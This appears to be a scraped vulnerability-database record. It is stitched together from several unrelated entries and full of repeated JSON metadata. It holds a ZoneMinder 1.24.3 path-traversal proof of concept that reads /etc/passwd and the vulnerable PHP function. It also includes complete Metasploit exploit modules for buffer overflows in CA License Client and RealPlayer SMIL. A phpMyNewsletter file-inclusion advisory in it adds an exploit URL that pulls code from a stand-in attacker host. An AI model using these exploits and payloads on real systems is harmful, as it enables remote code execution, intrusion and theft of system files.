ID 1337DAY-ID-16586 Type zdt Reporter iye Modified 2011-08-01T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability
# Author: Iye (iye[dot]cba-at-gmail[dot]com)
# Software Link: http://www.zoneminder.com/
# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested
# Tested on: Ubuntu 10.04
You must be authenticated as a user in the Web App to exploit it. It's
not a must to be admin.
POC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00
Reported to proyect mantainer (Philip Coombes) on 2011-07-22
Fix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt
Vulnerable Code:
/var/www/zm/includes/functions.php
--------------------------------------------------------
function getSkinFile( $file )
{
global $skinBase;
$skinFile = false;
foreach ( $skinBase as $skin )
{
$tempSkinFile = 'skins'.'/'.$skin.'/'.$file;
if ( file_exists( $tempSkinFile ) )
$skinFile = $tempSkinFile;
}
return( $skinFile );
}
--------------------------------------------------------
# 0day.today [2018-02-13] #
{"published": "2011-08-01T00:00:00", "id": "1337DAY-ID-16586", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:57:44", "bulletin": {"published": "2011-08-01T00:00:00", "id": "1337DAY-ID-16586", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 1.9, "modified": "2016-04-20T01:57:44"}}, "hash": "79fc884194b4ec2c6d0d485d9b30515935d826af90d36c6c9b60eea56bb7d455", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:57:44", "edition": 1, "title": "Zoneminder 1.24.3 Remote File Inclusion Vulnerability", "href": "http://0day.today/exploit/description/16586", "modified": "2011-08-01T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/16586", "references": [], "reporter": "iye", "sourceData": "# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability\r\n# Author: Iye (iye[dot]cba-at-gmail[dot]com)\r\n# Software Link: http://www.zoneminder.com/\r\n# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested\r\n# Tested on: Ubuntu 10.04\r\n \r\nYou must be authenticated as a user in the Web App to exploit it. It's\r\nnot a must to be admin.\r\n \r\nPOC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00\r\n \r\nReported to proyect mantainer (Philip Coombes) on 2011-07-22\r\nFix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt\r\n \r\nVulnerable Code:\r\n \r\n/var/www/zm/includes/functions.php\r\n--------------------------------------------------------\r\n \r\nfunction getSkinFile( $file )\r\n{\r\n global $skinBase;\r\n $skinFile = false;\r\n foreach ( $skinBase as $skin )\r\n {\r\n $tempSkinFile = 'skins'.'/'.$skin.'/'.$file;\r\n if ( file_exists( $tempSkinFile ) )\r\n $skinFile = $tempSkinFile;\r\n }\r\n return( $skinFile );\r\n}\r\n \r\n--------------------------------------------------------\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "f5087b0e1196e8ceb52729133a4b2c3b", "key": "sourceHref"}, {"hash": "77b762c9f213a26a824cb6fe8940c840", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "1e196b6a1e64cf3a672e29f7613373a0", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cb0e5a272803bb2ab84e8389ecca50eb", "key": "modified"}, {"hash": "8492f70cbdd67d1d1180c084dd62b01c", "key": "href"}, {"hash": "cb0e5a272803bb2ab84e8389ecca50eb", "key": "published"}, {"hash": "c8f2768d98b97982e54a020ee9f33d81", "key": "reporter"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "9cc4044c79b24160a7950d97c345f9da825ba9906aa389477b96e268ad4d8d4d", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2018-02-14T00:34:04"}, "dependencies": {"references": [], "modified": "2018-02-14T00:34:04"}, "vulnersScore": 0.0}, "type": "zdt", "lastseen": "2018-02-14T00:34:04", "edition": 2, "title": "Zoneminder 1.24.3 Remote File Inclusion Vulnerability", "href": "https://0day.today/exploit/description/16586", "modified": "2011-08-01T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/16586", "references": [], "reporter": "iye", "sourceData": "# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability\r\n# Author: Iye (iye[dot]cba-at-gmail[dot]com)\r\n# Software Link: http://www.zoneminder.com/\r\n# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested\r\n# Tested on: Ubuntu 10.04\r\n \r\nYou must be authenticated as a user in the Web App to exploit it. It's\r\nnot a must to be admin.\r\n \r\nPOC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00\r\n \r\nReported to proyect mantainer (Philip Coombes) on 2011-07-22\r\nFix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt\r\n \r\nVulnerable Code:\r\n \r\n/var/www/zm/includes/functions.php\r\n--------------------------------------------------------\r\n \r\nfunction getSkinFile( $file )\r\n{\r\n global $skinBase;\r\n $skinFile = false;\r\n foreach ( $skinBase as $skin )\r\n {\r\n $tempSkinFile = 'skins'.'/'.$skin.'/'.$file;\r\n if ( file_exists( $tempSkinFile ) )\r\n $skinFile = $tempSkinFile;\r\n }\r\n return( $skinFile );\r\n}\r\n \r\n--------------------------------------------------------\r\n\r\n\n\n# 0day.today [2018-02-13] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "ade7f9458c9190645da5e04033e960da", "key": "href"}, {"hash": "cb0e5a272803bb2ab84e8389ecca50eb", "key": "modified"}, {"hash": "cb0e5a272803bb2ab84e8389ecca50eb", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c8f2768d98b97982e54a020ee9f33d81", "key": "reporter"}, {"hash": "fed87abb680bb1f4603302fc29e54a23", "key": "sourceData"}, {"hash": "4047337aa8905eb9ce102189bf23724b", "key": "sourceHref"}, {"hash": "77b762c9f213a26a824cb6fe8940c840", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-11-29T21:39:08", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the CA License Client service. This exploit will only work if your IP address can be resolved from the target system point of view. This can be accomplished on a local network by running the 'nmbd' service that comes with Samba. If you are running this exploit from Windows and do not filter udp port 137, this should not be a problem (if the target is on the same network segment). Due to the bugginess of the software, you are only allowed one connection to the agent port before it starts ignoring you. If it wasn't for this issue, it would be possible to repeatedly exploit this bug.\n", "modified": "2017-11-08T16:00:24", "published": "2010-02-13T15:38:06", "id": "MSF:EXPLOIT/WINDOWS/LICENSE/CALICCLNT_GETCONFIG", "href": "", "type": "metasploit", "title": "Computer Associates License Client GETCONFIG Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'Computer Associates License Client GETCONFIG Overflow',\n 'Description'\t=> %q{\n This module exploits a vulnerability in the CA License Client\n service. This exploit will only work if your IP address can be\n resolved from the target system point of view. This can be\n accomplished on a local network by running the 'nmbd' service\n that comes with Samba. If you are running this exploit from\n Windows and do not filter udp port 137, this should not be a\n problem (if the target is on the same network segment). Due to\n the bugginess of the software, you are only allowed one connection\n to the agent port before it starts ignoring you. If it wasn't for this\n issue, it would be possible to repeatedly exploit this bug.\n },\n 'Author' =>\n [\n 'hdm', # original msf v2 module\n 'aushack', # msf v3 port :)\n ],\n 'License' => MSF_LICENSE,\n 'References'\t=>\n [\n [ 'CVE', '2005-0581' ],\n [ 'OSVDB', '14389' ],\n [ 'BID', '12705' ],\n [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space'\t=> 600,\n 'BadChars' => \"\\x00\\x20\",\n 'StackAdjustment' => -3500,\n\n },\n 'Platform'\t=> 'win',\n 'Targets' =>\n [\n # As much as I would like to return back to the DLL or EXE,\n # all of those modules have a leading NULL in the\n # loaded @ address :(\n # name, jmp esi, writable, jmp edi\n #['Automatic', {} ],\n #\n # aushack - tested OK Windows XP English SP0-1 only 20100214\n ['Windows 2000 English',\t{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi\n ['Windows XP English SP0-1',\t{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi\n ['Windows XP English SP2',\t{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi\n ['Windows 2003 English SP0',\t{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi\n ],\n 'DisclosureDate' => 'Mar 02 2005'))\n\n register_options(\n [\n Opt::RPORT(10203),\n OptPort.new('SRVPORT', [ true, \"Fake CA License Server Port\", 10202 ]),\n ])\n end\n\n #def check\n # It is possible to check, but due to a software bug, checking prevents exploitation\n #end\n\n def exploit\n if (connect)\n sock.put(\"A0 GETSERVER<EOM>\\n\")\n print_status(\"Initial packet sent to remote agent...\")\n disconnect\n\n fakecaservice = Rex::Socket::TcpServer.create(\n 'LocalHost' => '0.0.0.0',\n 'LocalPort' => datastore['SRVPORT'],\n 'SSL' => false,\n 'Context' =>\n {\n 'Msf' => framework,\n 'MsfExploit' => self,\n })\n\n add_socket(fakecaservice)\n\n fakecaservice.start\n print_status(\"Waiting for the license agent to connect back...\")\n begin\n Timeout.timeout(3) do\n done = false\n while (not done and session = fakecaservice.accept)\n print_status(\"Accepted connection from agent #{Rex::Socket.source_address(rhost)}..\")\n session.put(\"A0 GETCONFIG SELF 0<EOM>\")\n req = session.recvfrom(2000)[0]\n next if not req\n next if req.empty?\n\n if (req =~ /OS\\<([^\\>]+)/)\n print_status(\"Target reports OS: #{$1}\")\n end\n\n # exploits two different versions at once >:-)\n # 144 -> return address of esi points to string middle\n # 196 -> return address of edi points to string beginning\n # 148 -> avoid exception by patching with writable address\n # 928 -> seh handler (not useful under XP SP2)\n buff = rand_text_alphanumeric(900)\n buff[142, 2] = Rex::Arch::X86.jmp_short(8) \t\t# jmp over addresses\n buff[144, 4] = [target['Rets'][0]].pack('V') \t\t# jmp esi\n buff[148, 4] = [target['Rets'][1]].pack('V')\t\t# writable address\n buff[194, 2] = Rex::Arch::X86.jmp_short(4)\t\t# jmp over address\n buff[196, 4] = [target['Rets'][2]].pack('V')\t\t# jmp edi\n buff[272, payload.encoded.length] = payload.encoded\n\n sploit = \"A0 GETCONFIG SELF #{buff}<EOM>\"\n session.put(sploit)\n session.close\n end\n end\n ensure\n handler\n fakecaservice.close\n return\n end\n end\n end\nend\n\n=begin\neTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>\nBrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>\nlic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>\n=end\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/license/calicclnt_getconfig.rb"}, {"lastseen": "2019-11-26T14:06:27", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8. By creating a URL link to a malicious SMIL file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.smil'. This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8 build 6.0.9.584.\n", "modified": "2017-07-24T13:26:21", "published": "2007-02-03T13:10:31", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/REALPLAYER_SMIL", "href": "", "type": "metasploit", "title": "RealNetworks RealPlayer SMIL Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'RealNetworks RealPlayer SMIL Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.\n By creating a URL link to a malicious SMIL file, a remote attacker could\n overflow a buffer and execute arbitrary code.\n When using this module, be sure to set the URIPATH with an extension of '.smil'.\n This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8\n build 6.0.9.584.\n },\n 'License' => MSF_LICENSE,\n 'Author' => 'MC',\n 'References' =>\n [\n [ 'CVE', '2005-0455' ],\n [ 'OSVDB', '14305'],\n [ 'BID', '12698' ],\n ],\n\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n\n 'Payload' =>\n {\n 'Space' => 500,\n 'BadChars' => \"\\x00\\x90\\x0a\\x0d\\x20\\x3c\\x3e\\x2f\\x5c\\x22\\x58\\x3d\\x3b\\x40\\x3f\\x27\\x26\\x25\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'RealPlayer 10/8 on Windows 2000 SP0-SP4 English', { 'Offset' => 608, 'Ret' => 0x75022ac4 } ],\n [ 'RealPlayer 10/8 on Windows XP PRO SP0-SP1 English', { 'Offset' => 584, 'Ret' => 0x71aa2461 } ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 1 2005',\n 'DefaultTarget' => 0))\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n cruft = rand_text_alpha_upper(1)\n bleh = rand_text_alpha_upper(11)\n\n sploit = rand_text_alpha_upper(target['Offset']) + payload.encoded\n sploit << \"\\xeb\\x06\" + rand_text_alpha_upper(2) + [target.ret].pack('V')\n sploit << [0xe8, -485].pack('CV')\n\n # Build the HTML content\n content = \"<smil><head><layout><region id=\\\"#{cruft}\\\" top=\\\"#{cruft}\\\" /></layout></head>\"\n content << \"<body><text src=\\\"#{bleh}.txt\\\" region=\\\"size\\\" system-screen-size=\\\"#{sploit}\\\" /></body></smil>\"\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content, { 'Content-Type' => 'text/html' })\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/realplayer_smil.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "Product : phpMyNewsletter\r\nTested version : 0.6.10\r\nWebsite : http://gregory.kokanosky.free.fr/phpmynewsletter/\r\nProblem : include file\r\n\r\nPHP code :\r\n\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\r\n---- /include/customize.php ----\r\n<?\r\n$langfile = $l;\r\n\r\ninclude $l;\r\n?>\r\n---- /include/customize.php ----\r\n\r\nExploit :\r\n\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\r\nhttp://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World\r\nWith in http://[attacker]/code.txt :\r\n<? echo $text; ?>\r\n\r\nor\r\nhttp://[target]/include/customize.php?l=../path/file/to/view\r\n\r\nPatch :\r\n\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\r\nAutor has been alerted and last version (0.7beta1) has been patched.\r\n\r\nMore details\r\n- in french :\r\nhttp://www.frog-man.org/tutos/phpMyNewsletter.txt\r\n- translated by Google :\r\nhttp://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools\r\n\r\nfrog-m@n \r\n\r\n# milw0rm.com [2007-04-04]", "modified": "2007-04-05T00:00:00", "published": "2007-04-05T00:00:00", "id": "SECURITYVULNS:DOC:16586", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16586", "title": "phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability:", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
